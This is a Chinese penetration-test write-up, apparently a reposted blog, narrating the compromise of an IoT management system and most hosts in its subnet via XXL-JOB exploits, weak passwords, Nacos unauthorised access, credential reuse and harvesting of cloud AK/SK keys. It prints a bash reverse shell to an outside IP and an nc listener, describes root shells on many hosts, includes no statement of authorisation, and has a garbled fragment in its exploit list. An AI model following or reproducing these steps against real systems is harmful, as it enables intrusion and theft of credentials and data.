从登录封锁到打穿内网沦陷整个C段

厌外 · 2025-5-31 23:37:17

外网打点

OK！又是经典开局，一个登录框，看样子是某个IOT管理系统

[img=720,342.64285714285717]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/8ed0c5b8-bada-47b0-ac18-482533a56e9f.png[/img]

于是先去搜索了几个关键字看看有无Nday，无果，没事不慌，没有Nday就活不了了嘛？
于是直接试试弱口令，前端逻辑绕过，SQL……
结果发现还真是活不了
尝试登录时，直接爆系统错误，后端请求验证码的接口压根就异常了，直接不让你登录，就算得到了账号密码也登录不上去，因为验证码这一步的登录逻辑缺失，猜测应该是后台存在什么漏洞，或者前台是弱口令，系统被攻击了，让开发去修漏洞，开发为了省事或者不知道咋修，就直接把验证码禁用了，不让你登录，以前遇到几个若依的系统也是这样……

[img=720,347.7857142857143]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/bc09cdd1-2251-463e-9589-81f56386bbe0.png[/img]

那我们就没办法了吗？
直接来一套API接口，HTML源码，JS源码审计一条龙测试，好吧还真没办法，仍旧无果
都整不出来咋搞呢……
这时候我一般会去扫目录，扫端口，往往可能会打开新的攻击面，当然这也是老生常谈了
于是经典用ffuf扫一扫，除了302跳转到本网页之外没有任何东西……不急不急，再试试一定有突破口的（想骂人了）
无奈之下，本来都打算快放弃了，临走之前想着再端口扫描下吧？唉！还真扫出了一个9090端口，这不就柳暗花明了嘛
【----帮助网安学习，以下所有学习资料免费领！加vx：YJ-2021-1，备注 “博客园” 获取！】
　① 网安学习成长路径思维导图
　② 60+网安经典常用工具包
　③ 100+SRC漏洞分析报告
　④ 150+网安攻防实战技术电子书
　⑤ 最权威CISSP 认证考试指南+题库
　⑥ 超1800页CTF实战技巧手册
　⑦ 最新网安大厂面试题合集（含答案）
　⑧ APP客户端安全检测指南（安卓+IOS）
点开一看，这不是XXLJOB吗？这个可以尝试打一下的，有好几个Nday呢

[img=720,282.2142857142857]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/d2b89d56-2b4f-4a17-84a0-1f7c8dddd45e.png[/img]

有如下几个Nay，可以RCE的
<ul>
xxl-job api未授权Hessian2反序列化 nohup.out 2>&1 &[/code]

[img=720,117.64285714285714]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/64a6000b-5222-42a1-af9c-800a033e84fe.png[/img]

耐心等待一下上线，成功上线！

[img=720,199.92857142857142]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/aa4fa74a-700f-4cce-8bcf-4c6178fb6d95.png[/img]

代理

建立C2节点之后呢，穿一个socks5代理出来

[img=720,255.21428571428572]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/92a27b93-818e-4b54-bb4a-3da40d3cad3f.png[/img]

本机使用proxifier配置好全局代理规则，就可以直接请求对应的内网地址了

[img=720,325.92857142857144]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/3c8b5e8b-a788-45a6-bcb2-d4616d748483.png[/img]

信息收集

上传netspy扫一下网段存活，可以看到有大量网段存活，先记录一下待会拿去fscan扫一扫

[img=720,252.64285714285714]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/0f48fc3c-0f4b-40d1-8089-6844bfc3b8ce.png[/img]

再看看有没有docker容器运行

#!/bin/bash
/bin/bash -i >& /dev/tcp/11.111.11.111/1234 0>&1

复制代码

docker开了许多服务

[img=720,391.5]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/438211b1-6632-4d37-956f-c89b2124dd25.png[/img]

其中mysql就是docker启动的，我们可以直接进入到mysql容器里执行mysql命令，从而就直接获取到mysql权限

nc -lvvp 1234

复制代码

[img=720,416.57142857142856]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/af334a54-20ae-4f74-908a-962d3e8331e7.png[/img]

不过如果觉得这样不够直观我们还可以去翻找mysql数据库配置文件，既然是docker启动的mysql，那么数据库密码在docker-compose.yml配置文件里

[img=720,260.35714285714283]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/42a659fd-0bbd-41b2-a052-c53b275a02b0.png[/img]

成功找到用户名mysql，密码Zxxxxxxx

[img=720,217.92857142857142]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/b1775ec9-ff82-4c42-96a9-923add3a9fa7.png[/img]

直接拿去密码复用一下，用mysql的密码，登录root账号
数据库

也是成功登录root，mysql root权限+1

[img=720,325.2857142857143]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/cc47aab4-d57f-466f-86eb-78424c39f5ef.png[/img]

一共有16个数据库，其中还有nacos

[img=720,304.07142857142856]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/54243be7-e8af-476f-92de-e5204a9cd82a.png[/img]

上传免杀fscan，直接扫一波C段，都是存活的

[img=720,298.92857142857144]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/56112bcc-3d15-42a0-88e8-10e25cf758b0.png[/img]

东西还不少

[img=720,424.92857142857144]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/d9e38ae4-e62c-4f6f-97c2-4a0069447025.png[/img]

[img=720,415.92857142857144]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/2b5f4e5d-57d1-4dc0-bbe7-05eda117b5f1.png[/img]

[img=720,208.92857142857142]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/b9f416f5-8242-4a95-b792-bc6d878cdc41.png[/img]

获取权限

Nacos权限

[img=720,385.07142857142856]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/c14b8959-0ceb-4280-b6f1-7efd9864a1ac.png[/img]

nacos未授权访问，查看用户，看来已经有前人的足迹了

[img=720,344.57142857142856]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/ee5392f1-1939-465e-bdbf-f3c0d770254b.png[/img]

未授权直接创建一个用户 nacos3，进去翻垃圾吃

[img=720,224.35714285714286]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/16713d76-8dfa-4b27-bf07-16dbaa008d1f.png[/img]

10条配置信息

mysql权限

发现mysql数据库用户名和密码，mysql数据库root权限+1

[img=720,332.35714285714283]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/1e6eefb2-5ee1-46a6-891c-a0131d6e88ad.png[/img]

redis权限

redis权限+1

[img=720,344.57142857142856]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/4d9fcb57-535c-4bc6-9091-9dcd02d32e2d.png[/img]

es权限

es权限+1

[img=720,331.7142857142857]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/f3d0770e-cd0f-498f-90d3-65d6490cc179.png[/img]

ftp权限

ftp+1

[img=720,320.7857142857143]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/4c22a90b-7e54-4c38-a150-c981e4d923a5.png[/img]

三方短信权限

第三方短信平台权限+1

[img=720,275.14285714285717]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/9de3fe31-2c1a-4cc2-b80c-53250c9a43cc.png[/img]

tdengine权限

tdengine权限

[img=720,334.92857142857144]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/fd915641-480a-4399-a923-b2a68c7206ad.png[/img]

kafka权限

kafka权限+1

[img=720,345.2142857142857]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/2e345508-2c63-45ac-8fe6-e1b8ac8ea962.png[/img]

[img=720,339.42857142857144]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/645196a4-b330-4b0c-bda8-91220a6fd185.png[/img]

百度谷歌地图权限

百度地图AK+1，谷歌Key+1

[img=720,338.14285714285717]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/1ffe0d91-b558-49b1-9c34-78a207622e9e.png[/img]

IOT设备权限

API密钥AK/SK，IOT设备权限+1

[img=720,332.35714285714283]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/d84bee1a-c586-4cd9-ae48-8a8181a37f39.png[/img]

OSS权限

OSS AK/SK权限+1

[img=720,334.2857142857143]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/b388b4e1-06df-4f0b-8077-31d992ec8a53.png[/img]

OSS AK/SK权限+1

[img=720,266.14285714285717]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/c225da9f-a7b4-40fb-a87d-560e20ad173e.png[/img]

OSS AK/SK权限+1

[img=720,147.85714285714286]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/727811fa-8520-4615-99ee-f5ab0234f174.png[/img]

阿里云短信权限

阿里云短信平台 AK/SK

[img=720,335.57142857142856]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/6e0f745c-b66d-4f03-836f-e651dd1015f0.png[/img]

RocketMQ权限

RocketMQ未授权+1

[img=720,394.7142857142857]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/cc9dacf5-ba98-41e5-8ed9-f1dd4858b796.png[/img]

KafkaServer权限

KafkaServer权限

[img=720,285.42857142857144]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/5c85360d-8c59-47fa-a06c-88f43eb7008f.png[/img]

[img=720,217.28571428571428]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/ac731fc6-0179-4926-8560-7abb13e07f94.png[/img]

zk权限

zk权限

[img=720,128.57142857142858]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/98f8bd66-454f-43cf-a298-d81c0f647a05.png[/img]

Memcached权限

Memcached未授权

[img=720,454.5]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/f1068e23-7263-47f5-bc41-4fef6e7a6359.png[/img]

使用本地搭建的MemAdmin读取数据，是一些邮箱和服务器地址而已

[img=720,358.7142857142857]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/35fd52e9-753d-44c3-a777-22ecbea24276.png[/img]

横向移动

让我有点小激动的是，fscan的扫描结果显示，整个C段下居然几乎每个主机都部署了XXL-JOB系统，而且经过我的尝试，都是清一色的弱口令！admin / 123456。真的是纯运气。

[img=720,398.57142857142856]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/50f6c8d7-8973-4f6a-925c-83b6ce07bc14.png[/img]

（每个主机都部署了XXL-JOB的fscan扫描截图忘记截图了）
简单列举几个

61主机

[img=720,372.2142857142857]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/97a71391-bff2-4149-97d6-ec8b5e28c9ac.png[/img]

31主机

[img=720,412.7142857142857]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/50ec5a8f-544e-4410-bab6-084f594c9d90.png[/img]

209主机

[img=720,400.5]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/f8736bc8-6257-4d5c-b4e8-b8dbd0d160ad.png[/img]

反弹shell，都是root权限

[img=720,199.92857142857142]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/16b21d57-06a2-458e-aaed-14014e5b1baf.png[/img]

[img=720,75.21428571428571]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/ddbfb44b-97db-4158-a136-9d3a2c2ebad5.png[/img]

[img=720,77.14285714285714]https://www.yijinglab.com/guide-img/417184a9-9bfe-41be-b74b-606afd783052/0a5ae4a6-ad55-414f-a7d3-3e6ad7f6351c.png[/img]

凭借运气+fscan，脚本小子获取到了几乎整个C段主机的权限，当然还有大量的各种web系统的Nday没有去看了，太多了
其实是因为代理不稳定，或者是网络问题。代理特别的慢，导致内网遨游很不顺畅（这也是我为什么要上传工具到受害主机上去，而不在本地通过代理去扫描的原因），特别难受，半天加载不出来，于是就没有继续利用了……
小结

到此，全篇结束。本篇没有什么很高级的红队技巧，全凭运气，因为笔者红队技术菜，行文以及渗透时有许多地方考虑不周，欢迎各位大佬在评论区留言指教，晚辈感激不尽。但是当成一个新手师傅入门的渗透案例看看我觉得还行，于是就发了出来，下次再见师傅们！
更多网安技能的在线实操练习，请点击这里>>

来源：程序园用户自行投稿发布，如果侵权，请联系站长删除
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！

账号		自动登录	找回密码
密码			立即注册